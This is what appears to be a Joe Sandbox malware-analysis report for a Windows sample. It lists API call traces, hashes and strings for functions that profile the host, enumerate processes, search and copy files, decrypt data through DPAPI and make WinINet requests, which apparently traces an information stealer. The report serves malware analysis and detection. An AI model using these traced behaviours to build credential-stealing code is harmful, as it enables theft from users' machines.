GetCurrentProcessId.KERNEL32(00000000,?,04287238,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04286808,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,042826C0,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04287258,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,042867D8,00000000,?,0041D774,00000000,?,00000000,00000000,?,042867C0), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,042834D0,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04280B98), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 22d7a7d0c7b304599765e8ddbccc43f3bd0ddbeea23b2a3725928c9e41e79a48
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 22d7a7d0c7b304599765e8ddbccc43f3bd0ddbeea23b2a3725928c9e41e79a48
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0427DC48,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: c7fc50483193d53b4448ec0d7246a2eb933f79da53e90fa6d6319662e6a0464c
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: c7fc50483193d53b4448ec0d7246a2eb933f79da53e90fa6d6319662e6a0464c
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,04286B50), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

DPAPI, xrefs: 0040976B
, xrefs: 004097A3

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 0f5c4bf38f16a5dc7c6c7dc1d4b3af3428d24ec323dc2f9b096cad114df4e3c7
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 1a0ef18b8f83ca929ce2d2d63e3a5c7deae1fcedb9ce826cce40a9630259278b
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: 1a0ef18b8f83ca929ce2d2d63e3a5c7deae1fcedb9ce826cce40a9630259278b
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0427DC48,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0427DC48,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 0040684E, 0040679E, 004067C2, 00406884, 0040689F

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID:
String ID: Pi@
API String ID: 0-1360946908
Opcode ID: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction ID: 3e1b1374d11ee30af11b8018be346ecc1401931fa3badc01db0dac5c56ce0c6a
Opcode Fuzzy Hash: 8cfa37973c56b3597612bf0eabde1d0c10c792fef38bbd1cab651f123bbbde38
Instruction Fuzzy Hash: 756105B5D00208DBDB14DF94D984BEEB7B0AB48304F1185AAE80677380D739AEA5DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Strings

<, xrefs: 00404489

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlenmalloc
String ID: <
API String ID: 3848002758-4251816714
Opcode ID: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction ID: 4ed07355fbd84ea2b0e25782c0c6f45789bb77a73037a8222357df496ca5bcbd
Opcode Fuzzy Hash: 687962ccc4eae67d17fcff549de06531ab168f4bf6ac0391c2f29faedae00af7
Instruction Fuzzy Hash: 52216DB1D00208ABDF10EFA5E845BDD7B74AB44324F008229FA25B72C0EB346A46CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF80 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04280998), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04280878), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,042809E8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: facbcfeb329d3f9815475b54a06f180d61b580abb6e0d2298b8d5075a3fb8c5d
Instruction ID: 4355cab003f180362ea4467312be264c8b2230b95154913c46dc9b5fce20c885
Opcode Fuzzy Hash: facbcfeb329d3f9815475b54a06f180d61b580abb6e0d2298b8d5075a3fb8c5d
Instruction Fuzzy Hash: 8D719871B002099BCF08FF75D9929EEB77AAF94304B10852EF4099B285EA34DE45CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF9F Relevance: 4.7, APIs: 3, Instructions: 177COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,04280998), ref: 0040EFCE
StrCmpCA.SHLWAPI(00000000,04280878), ref: 0040F06F
StrCmpCA.SHLWAPI(00000000,042809E8), ref: 0040F17E

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 91cd0639fafd06dc0a39cd937359a2c576a7600d13c88bfeca31e0903ecbd99f
Instruction ID: f0c51ec5e8e6f52f2f367cc82315d09f99f950b48122d5325302ee48485a66a2
Opcode Fuzzy Hash: 91cd0639fafd06dc0a39cd937359a2c576a7600d13c88bfeca31e0903ecbd99f
Instruction Fuzzy Hash: 03618A71B002099FCF08EF75D9929EEB77AAF94304B10852EF4099B295DA34EE45CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 004127E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 0041281A
lstrcat.KERNEL32(?,04287318), ref: 00412838

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041260A
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D4B2), ref: 0041261C
Part of subcall function 00412570: wsprintfA.USER32 ref: 00412639
Part of subcall function 00412570: PathMatchSpecA.SHLWAPI(?,?), ref: 0041266F
Part of subcall function 00412570: lstrcat.KERNEL32(?,04280AB8), ref: 0041269B
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D880), ref: 004126AD
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126BE
Part of subcall function 00412570: lstrcat.KERNEL32(?,0041D884), ref: 004126D0
Part of subcall function 00412570: lstrcat.KERNEL32(?,?), ref: 004126E4
Part of subcall function 00412570: CopyFileA.KERNEL32(?,?,00000001), ref: 004126FA
Part of subcall function 00412570: DeleteFileA.KERNEL32(?), ref: 00412779

Part of subcall function 00412570: wsprintfA.USER32 ref: 0041265B

Strings

00A, xrefs: 0041285C, 0041288B, 004128BB, 004128EA, 0041291A, 00412949, 0041296B, 0041285F, 0041288E, 004128BE, 004128ED, 0041291D, 0041294C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: 00A
API String ID: 2104210347-95910775
Opcode ID: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction ID: 9a839e9be304faf39bc4facc08b08f26c4420ed68fa3aa933a56f5c5bfc0aac5
Opcode Fuzzy Hash: aee14ac10de1ece76b3008eda533a8383be3bc2d628396bcb6b319180cdda7cd
Instruction Fuzzy Hash: 6441ABB7A001047BCB24FBE0DC92EEA377E9B94705F00424DB55987191ED74A7D48BD9

Uniqueness

Uniqueness Score: -1.00%

Function 6BA13060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6BA13095

Part of subcall function 6BA135A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6BA9F688,00001000), ref: 6BA135D5
Part of subcall function 6BA135A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA135E0
Part of subcall function 6BA135A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6BA135FD
Part of subcall function 6BA135A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA1363F
Part of subcall function 6BA135A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA1369F
Part of subcall function 6BA135A0: __aulldiv.LIBCMT ref: 6BA136E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BA1309F

Part of subcall function 6BA35B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA356EE,?,00000001), ref: 6BA35B85
Part of subcall function 6BA35B50: EnterCriticalSection.KERNEL32(6BA9F688,?,?,?,6BA356EE,?,00000001), ref: 6BA35B90
Part of subcall function 6BA35B50: LeaveCriticalSection.KERNEL32(6BA9F688,?,?,?,6BA356EE,?,00000001), ref: 6BA35BD8
Part of subcall function 6BA35B50: GetTickCount64.KERNEL32 ref: 6BA35BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6BA130BE

Part of subcall function 6BA130F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6BA13127
Part of subcall function 6BA130F0: __aulldiv.LIBCMT ref: 6BA13140

Part of subcall function 6BA4AB2A: __onexit.LIBCMT ref: 6BA4AB30

Memory Dump Source

Source File: 00000001.00000002.2187714449.000000006BA11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BA10000, based on PE: true

Associated: 00000001.00000002.2187694084.000000006BA10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187802470.000000006BA9E000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2187822727.000000006BAA2000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba10000_u5mc.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 35da7feb11ff5a75906e489e2dc6e5487dc779eb3d02fcb5846a36c03568b8bc
Instruction ID: d493b8e74fc3e0c002e5c05ac68c92980888209bfda3a39c7dab560ea838b43d
Opcode Fuzzy Hash: 35da7feb11ff5a75906e489e2dc6e5487dc779eb3d02fcb5846a36c03568b8bc
Instruction Fuzzy Hash: BBF0D632C38784A6CE10FF3889421AA73A4AF6B214B50932DF98556011FF31B1E79381

Uniqueness

Uniqueness Score: -1.00%

Function 00415B70 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
CloseHandle.KERNEL32(00000000), ref: 00415BAF

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction ID: b12b055c0fde6327b7bfc42128d307bcca402a5100f46dd347d8d84938e244fe
Opcode Fuzzy Hash: 97fc9d568dab5260ce1fa1a51ba1ebaf2853d767a04b83f08cd6b5726440208b
Instruction Fuzzy Hash: C5F05475A0010CFBDB14DFA4DC4AFED7778BB08300F004499BA0597280D6B06E85CB94

Uniqueness

Uniqueness Score: -1.00%

